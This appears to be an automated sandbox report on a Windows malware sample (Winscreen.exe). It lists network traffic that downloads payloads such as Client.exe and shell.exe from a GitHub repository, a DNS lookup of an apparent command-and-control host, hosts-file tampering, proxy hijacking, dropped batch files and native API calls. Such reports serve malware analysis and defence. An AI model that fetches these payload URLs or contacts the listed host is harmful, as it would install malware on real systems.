                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/refs/heads/main/Client.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/taskmoder.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: github.com
                        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                        Source: global trafficDNS traffic detected: DNS query: start-supplier.at.ply.gg
                        Source: global trafficDNS traffic detected: DNS query: 240.163.3.0.in-addr.arpa
                        Source: taskmen.exe, 00000020.00000002.4582393087.000000000310D000.00000004.00000800.00020000.00000000.sdmp, taskmen.exe, 00000020.00000002.4543464528.00000000013B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe
                        Source: upx.exe, 00000011.00000002.2175605173.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cM
                        Source: powershell.exe, 00000002.00000002.2106981246.00000277BF231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000002.00000002.2089574669.00000277AF3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000002.00000002.2089574669.00000277AF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BBC1000.00000004.00000800.00020000.00000000.sdmp, taskmen.exe, 00000020.00000002.4582393087.000000000310D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.2089574669.00000277AF3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000002.00000002.2089574669.00000277AF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BBC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: taskmen.exe, 00000020.00000002.4582393087.000000000313B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                        Source: powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000B.00000002.2303338366.000001E9B4316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                        Source: powershell.exe, 00000002.00000002.2106981246.00000277BF231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: places.raw.43.drString found in binary or memory: https://support.mozilla.org
                        Source: places.raw.43.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: places.raw.43.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                        Source: places.raw.43.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800

                        E-Banking Fraud

                        barindex
                        Sets a proxy for the internet explorer
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Enables a proxy for the internet explorer
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable
                        Sets a proxy for the internet explorer
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: 01 00 00 00
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: 01 00 00 00

                        System Summary

                        barindex
                        PE file contains section with special chars
                        Source: Winscreen.exeStatic PE information: section name: .?c$
                        Source: Winscreen.exeStatic PE information: section name: .$sY
                        Source: explorer.exe.0.drStatic PE information: section name: .nK\
                        Source: explorer.exe.0.drStatic PE information: section name: .)Fk
                        Source: explorer.exe.0.drStatic PE information: section name: .&|8
                        Source: taskmoder.exe.0.drStatic PE information: section name: .m[{
                        Source: taskmen.exe.0.drStatic PE information: section name: .7'g
                        Source: taskmen.exe.0.drStatic PE information: section name: .{a"
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F14278 NtUnmapViewOfSection,0_2_00007FF848F14278
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F14AD8 NtDeviceIoControlFile,0_2_00007FF848F14AD8
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F149C9 NtQueryVolumeInformationFile,0_2_00007FF848F149C9
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1449D NtOpenFile,0_2_00007FF848F1449D
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F13BB2 NtQueryInformationProcess,0_2_00007FF848F13BB2
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F13E14 NtClose,0_2_00007FF848F13E14
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F13D20 NtSetInformationThread,0_2_00007FF848F13D20
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F145E1 NtCreateSection,0_2_00007FF848F145E1
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F14029 NtAllocateVirtualMemory,0_2_00007FF848F14029
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F14840 NtMapViewOfSection,0_2_00007FF848F14840
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F13EF8 NtProtectVirtualMemory,0_2_00007FF848F13EF8
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1473D NtQuerySystemInformation,0_2_00007FF848F1473D
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F13C19 NtQueryInformationProcess,0_2_00007FF848F13C19
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55258 NtProtectVirtualMemory,7_2_00007FF848F55258
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55A9D NtQuerySystemInformation,7_2_00007FF848F55A9D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55941 NtCreateSection,7_2_00007FF848F55941
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55174 NtClose,7_2_00007FF848F55174
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55389 NtAllocateVirtualMemory,7_2_00007FF848F55389
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55BA0 NtMapViewOfSection,7_2_00007FF848F55BA0
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55E38 NtDeviceIoControlFile,7_2_00007FF848F55E38
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55D29 NtQueryVolumeInformationFile,7_2_00007FF848F55D29
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F555D8 NtUnmapViewOfSection,7_2_00007FF848F555D8
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F557FD NtOpenFile,7_2_00007FF848F557FD
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F55080 NtSetInformationThread,7_2_00007FF848F55080
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F54F79 NtQueryInformationProcess,7_2_00007FF848F54F79
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC500 NtQuerySystemInformation,31_2_010AC500
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB560 NtQueryInformationProcess,31_2_010AB560
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB9C0 NtAllocateVirtualMemory,31_2_010AB9C0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB890 NtProtectVirtualMemory,31_2_010AB890
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC8D0 NtDeviceIoControlFile,31_2_010AC8D0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC7A8 NtQueryVolumeInformationFile,31_2_010AC7A8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB7A0 NtClose,31_2_010AB7A0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC3B8 NtCreateSection,31_2_010AC3B8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC618 NtMapViewOfSection,31_2_010AC618
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB688 NtSetInformationThread,31_2_010AB688
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC280 NtOpenFile,31_2_010AC280
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB559 NtQueryInformationProcess,31_2_010AB559
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB9B8 NtAllocateVirtualMemory,31_2_010AB9B8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB88C NtProtectVirtualMemory,31_2_010AB88C
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC8C8 NtDeviceIoControlFile,31_2_010AC8C8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC4F8 NtQuerySystemInformation,31_2_010AC4F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB798 NtClose,31_2_010AB798
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC7A0 NtQueryVolumeInformationFile,31_2_010AC7A0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC3B1 NtCreateSection,31_2_010AC3B1
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC611 NtMapViewOfSection,31_2_010AC611
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AC279 NtOpenFile,31_2_010AC279
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AB681 NtSetInformationThread,31_2_010AB681
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C920 NtMapViewOfSection,32_2_0553C920
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553B990 NtSetInformationThread,32_2_0553B990
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C588 NtOpenFile,32_2_0553C588
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553B868 NtQueryInformationProcess,32_2_0553B868
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C808 NtQuerySystemInformation,32_2_0553C808
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553BCC8 NtAllocateVirtualMemory,32_2_0553BCC8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553CBD8 NtDeviceIoControlFile,32_2_0553CBD8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553BB98 NtProtectVirtualMemory,32_2_0553BB98
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C6C0 NtCreateSection,32_2_0553C6C0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553CAB0 NtQueryVolumeInformationFile,32_2_0553CAB0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553BAA8 NtClose,32_2_0553BAA8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C919 NtMapViewOfSection,32_2_0553C919
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C581 NtOpenFile,32_2_0553C581
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553B989 NtSetInformationThread,32_2_0553B989
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553B862 NtQueryInformationProcess,32_2_0553B862
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C801 NtQuerySystemInformation,32_2_0553C801
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553BCC0 NtAllocateVirtualMemory,32_2_0553BCC0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553CBD0 NtDeviceIoControlFile,32_2_0553CBD0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553BB91 NtProtectVirtualMemory,32_2_0553BB91
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553C6B9 NtCreateSection,32_2_0553C6B9
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553BAA2 NtClose,32_2_0553BAA2
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553CAA8 NtQueryVolumeInformationFile,32_2_0553CAA8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB688 NtSetInformationThread,33_2_02EBB688
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC280 NtOpenFile,33_2_02EBC280
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC618 NtMapViewOfSection,33_2_02EBC618
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB7A0 NtClose,33_2_02EBB7A0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC3B8 NtCreateSection,33_2_02EBC3B8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB890 NtProtectVirtualMemory,33_2_02EBB890
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB560 NtQueryInformationProcess,33_2_02EBB560
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC500 NtQuerySystemInformation,33_2_02EBC500
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB686 NtSetInformationThread,33_2_02EBB686
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC279 NtOpenFile,33_2_02EBC279
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC611 NtMapViewOfSection,33_2_02EBC611
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC3B0 NtCreateSection,33_2_02EBC3B0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB798 NtClose,33_2_02EBB798
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBC4F8 NtQuerySystemInformation,33_2_02EBC4F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB88C NtProtectVirtualMemory,33_2_02EBB88C
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBB559 NtQueryInformationProcess,33_2_02EBB559
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3FA91 NtClose,35_2_00007FF848F3FA91
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3F901 NtSetInformationThread,35_2_00007FF848F3F901
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F40109 NtUnmapViewOfSection,35_2_00007FF848F40109
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F409F5 NtMapViewOfSection,35_2_00007FF848F409F5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F40C49 NtQueryVolumeInformationFile,35_2_00007FF848F40C49
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F40475 NtOpenFile,35_2_00007FF848F40475
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3FBD5 NtProtectVirtualMemory,35_2_00007FF848F3FBD5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F40E01 NtDeviceIoControlFile,35_2_00007FF848F40E01
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F40661 NtCreateSection,35_2_00007FF848F40661
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3FD9D NtAllocateVirtualMemory,35_2_00007FF848F3FD9D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F4086D NtQuerySystemInformation,35_2_00007FF848F4086D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3F759 NtQueryInformationProcess,35_2_00007FF848F3F759
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F14AD8: NtDeviceIoControlFile,0_2_00007FF848F14AD8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeFile created: C:\Windows\System32\drivers\etc\h?sts
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeFile created: C:\Windows\System32\drivers\etc\h?sts
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeFile created: C:\Windows\winsin.bat
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\Client.exe
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\taskmoder.exe
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\win.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\fail.bat
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Windows\shell.exe
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile deleted: C:\Windows\taskmoder.exe
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F039EE0_2_00007FF848F039EE
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0DA9A0_2_00007FF848F0DA9A
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F16ABD0_2_00007FF848F16ABD
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1093F0_2_00007FF848F1093F
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1AC100_2_00007FF848F1AC10
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F01C5E0_2_00007FF848F01C5E
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1A3D80_2_00007FF848F1A3D8
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0052D0_2_00007FF848F0052D
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0DDA00_2_00007FF848F0DDA0
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F08F160_2_00007FF848F08F16
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F031E70_2_00007FF848F031E7
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F029D60_2_00007FF848F029D6
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F15A1D0_2_00007FF848F15A1D
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F079910_2_00007FF848F07991
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F16AB00_2_00007FF848F16AB0
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F11AED0_2_00007FF848F11AED
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F012EB0_2_00007FF848F012EB
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F151550_2_00007FF848F15155
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0A9600_2_00007FF848F0A960
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F00BE00_2_00007FF848F00BE0
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F00BD80_2_00007FF848F00BD8
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F00BC80_2_00007FF848F00BC8
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F05BA20_2_00007FF848F05BA2
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F023A00_2_00007FF848F023A0
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0533F0_2_00007FF848F0533F
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F093300_2_00007FF848F09330
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1B3650_2_00007FF848F1B365
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F00C380_2_00007FF848F00C38
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F02C340_2_00007FF848F02C34
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0B3EA0_2_00007FF848F0B3EA
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F005F00_2_00007FF848F005F0
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0058D0_2_00007FF848F0058D
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0A6A00_2_00007FF848F0A6A0
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F10EC90_2_00007FF848F10EC9
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F03D1F0_2_00007FF848F03D1F
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F056ED0_2_00007FF848F056ED
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F006650_2_00007FF848F00665
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F047E30_2_00007FF848F047E3
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F1A8190_2_00007FF848F1A819
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F057C20_2_00007FF848F057C2
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F160310_2_00007FF848F16031
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F02FAC0_2_00007FF848F02FAC
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F00F910_2_00007FF848F00F91
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0278C0_2_00007FF848F0278C
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F03F5A0_2_00007FF848F03F5A
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F017540_2_00007FF848F01754
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F0073D0_2_00007FF848F0073D
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F150F10_2_00007FF848F150F1
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F058D20_2_00007FF848F058D2
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F030C50_2_00007FF848F030C5
                        Source: C:\Users\user\Desktop\Winscreen.exeCode function: 0_2_00007FF848F050510_2_00007FF848F05051
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4F2107_2_00007FF848F4F210
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F51A767_2_00007FF848F51A76
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F492D57_2_00007FF848F492D5
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F409687_2_00007FF848F40968
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F409D87_2_00007FF848F409D8
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4CB707_2_00007FF848F4CB70
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F5BB807_2_00007FF848F5BB80
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F57D5D7_2_00007FF848F57D5D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4C8CE7_2_00007FF848F4C8CE
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4F7767_2_00007FF848F4F776
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F45A207_2_00007FF848F45A20
